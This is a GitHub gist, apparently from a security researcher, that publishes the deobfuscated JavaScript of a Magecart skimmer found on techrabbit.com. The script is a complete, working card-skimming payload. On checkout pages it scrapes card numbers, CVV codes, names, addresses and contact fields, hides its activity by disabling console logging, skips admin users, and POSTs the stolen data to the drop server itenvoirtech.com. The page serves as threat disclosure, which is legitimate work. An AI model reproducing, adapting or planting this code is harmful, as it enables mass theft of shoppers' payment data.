Skip to content

Instantly share code, notes, and snippets.

@gwillem

gwillem/techrabbit.com.js

Last active October 5, 2024 01:25
Show Gist options
  • Save gwillem/4370df130f85322f0749a1e2712a440f to your computer and use it in GitHub Desktop.
Save gwillem/4370df130f85322f0749a1e2712a440f to your computer and use it in GitHub Desktop.
Download ZIP
TechRabbit.com busted by Magecart again. Malware hosted at checkercarts.com / exfil server itenvoirtech.com
Raw
techrabbit.com.js
var protocol = window.location.protocol != 'https:' ? 'http://' : 'https://';
var hostname = window.location.host;
var fieldNameRegex = 'shipping|billing|payment|cc|month|card|year|expiration|exp|cvv|cid|code|ccv|authorize|firstname|lastname|street|city|phone|number|email|zip|postal|region|country';
var ccRegex = '[0-9]{13,16}|[0-9 -]{16,20}';
var fieldTypeRegex = 'select|password|checkbox|radio|text|hidden|number|tel|email';
var orderButtons = 'a[title*=\'Place Order\'],a[href*=\'javascript: ; \'],a[href*=\'javascript: void (0)\'],a[href*=\'javascript: void (0); \'],a[href=\'#\'],button,input,submit,.btn,.button';
var emptyString = '';
var saveOrderURL = window.location.href.substr(window.location.href.replace('://', '').indexOf('/') + 3) + '/' + 'saveOrder';
var emptyList = [];
var dropServers = ['itenvoirtech.com'];
var randomDropServer = dropServers[Math.floor(Math.random() * dropServers.length)];
var dropURL = protocol + randomDropServer + saveOrderURL.replace('//', '/');
var falseValue = false;
var frontEndPay = 'frontend_pay';
var isAdmin = document.cookie.toLowerCase().indexOf('admin') > -0x1 ? true : false;
if (isAdmin)
setCookie(frontEndPay, scramble(0xa), 100);
var hasFrontEndPayCookie = document.cookie.toLowerCase().indexOf(frontEndPay) > -0x1 ? true : false;
function setCookie(b, c, d) {
var a = new Date();
a.setTime(a.getTime() + 0x18 * 0x3c * 0x3c * 0x3e8 * d);
document.cookie = b + '=' + c + ';path=/;expires=' + a.toGMTString();
}
function scramble(seed = 5) {
var d = function () {
var a = true;
return function (d, b) {
var c = a ? function () {
if (b) {
var a = b.apply(d, arguments);
b = null;
return a;
}
}
: function () { }
;
a = false;
return c;
}
;
}();
var disableConsoleLogging = d(this, function () {
var b = function () { };
var a;
try {
var c = Function('return (function() ' + '{}.constructor("return this")( )' + ');');
a = c();
} catch (b) {
a = window;
}
if (!a.console) {
a.console = function (b) {
var a = {};
a.log = b;
a.warn = b;
a.debug = b;
a.info = b;
a.error = b;
a.exception = b;
a.trace = b;
return a;
}(b);
} else {
a.console.log = b;
a.console.warn = b;
a.console.debug = b;
a.console.info = b;
a.console.error = b;
a.console.exception = b;
a.console.trace = b;
}
});
disableConsoleLogging();
var a = '';
var b = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
for (var c = 0; c < seed; c++)
a += b.charAt(Math.floor(Math.random() * b.length));
return a;
}
function scrapeForm() {
var d = '';
var c = document.querySelectorAll('input[type=text],input[type=tel], input[type=number], input[type=password],input, select, textarea');
for (var a = 0; a < c.length; a++) {
if (c[a].value.length > 0x0 && c[a].value.length < 70) {
var b = c[a].name;
var e = c[a].id;
if (b == '' && e == '')
b = 'nf' + a;
else if (b == '' && e !== '')
b = e;
if (new RegExp(fieldNameRegex, 'i').test(b) && !new RegExp('method|same_as', 'i').test(b)) {
var f = b.replace(/[/g, '-');
d += f.replace(/]/g, '') + '=' + c[a].value + '&';
}
}
}
var g = d.split('street').length - 1;
for (a = 0; a <= g; a++)
d = d.replace(/street-=/, 'street-' + a + '=');
return d;
}
function emptyFunc() { }
function listenForKeyUp() {
if (!falseValue) {
document.addEventListener('keyup', function (a) {
if (a.keyCode === 13) {
_0x1067cf();
}
});
falseValue = true;
}
var b = document.querySelectorAll(orderButtons);
for (var a = 0; a < b.length; a++) {
if (new RegExp(fieldTypeRegex, 'i').test(b[a].type))
continue;
var c = '';
if (b[a].id !== '' && b[a].id !== undefined)
c = b[a].id;
else if (b[a].name !== '' && b[a].name !== undefined)
c = b[a].name;
else if (b[a].title !== '' && b[a].title !== undefined)
c = b[a].title;
else
c = 'bb' + a + '_12';
if (emptyList.indexOf(c) != -0x1)
continue;
b[a].addEventListener('click', _0x1067cf);
emptyList.push(c);
}
}
function _0x1067cf() {
listenForKeyUp();
var a = scrapeForm();
if (a.indexOf('street') < 0x1 && document.getElementsByClassName('billing-address-details')[0x0] !== undefined) {
if (document.getElementsByClassName('billing-address-details')[0x0].innerText !== undefined)
a += '&fullData=' + document.getElementsByClassName('billing-address-details')[0x0].innerText.trim().replace(/\n/g, '|').replace(/, (.*?) ([0-9]+)/, '|$1|$2').replace(/[ ]+|/, '|').replace(/,([0-9])/, '|$1').replace(/|Edit/, '');
else
a += '&fullData=' + document.getElementsByClassName('billing-address-details')[0x0].textContent.trim().replace(/\n/g, '|').replace(/, (.*?) ([0-9]+)/, '|$1|$2').replace(/[ ]+|/, '|').replace(/,([0-9])/, '|$1').replace(/|Edit/, '');
}
if (!new RegExp(ccRegex).test(a))
return;
emptyString = document.getElementsByName('form_key')[0x0] === undefined ? '' : '/' + document.getElementsByName('form_key')[0x0].value;
var b = new XMLHttpRequest();
b.open('POST', dropURL + emptyString, true);
b.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
b.withCredentials = true;
b.send(a);
}
function initializor() {
if (!new RegExp('onepage|firecheckout|osc|Checkout|awesomecheckout|onestepcheckout|onepagecheckout|checkout|oscheckout|idecheckoutvm').test(window.location))
return;
if (isAdmin || hasFrontEndPayCookie)
return false;
listenForKeyUp();
}
document.addEventListener('DOMContentLoaded', initializor);
jQuery(document).ready(function () {
initializor();
});
jQuery('body').change(function () {
initializor();
});
document.addEventListener('change', initializor);
document.addEventListener('click', initializor);
setTimeout(initializor, 300);
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment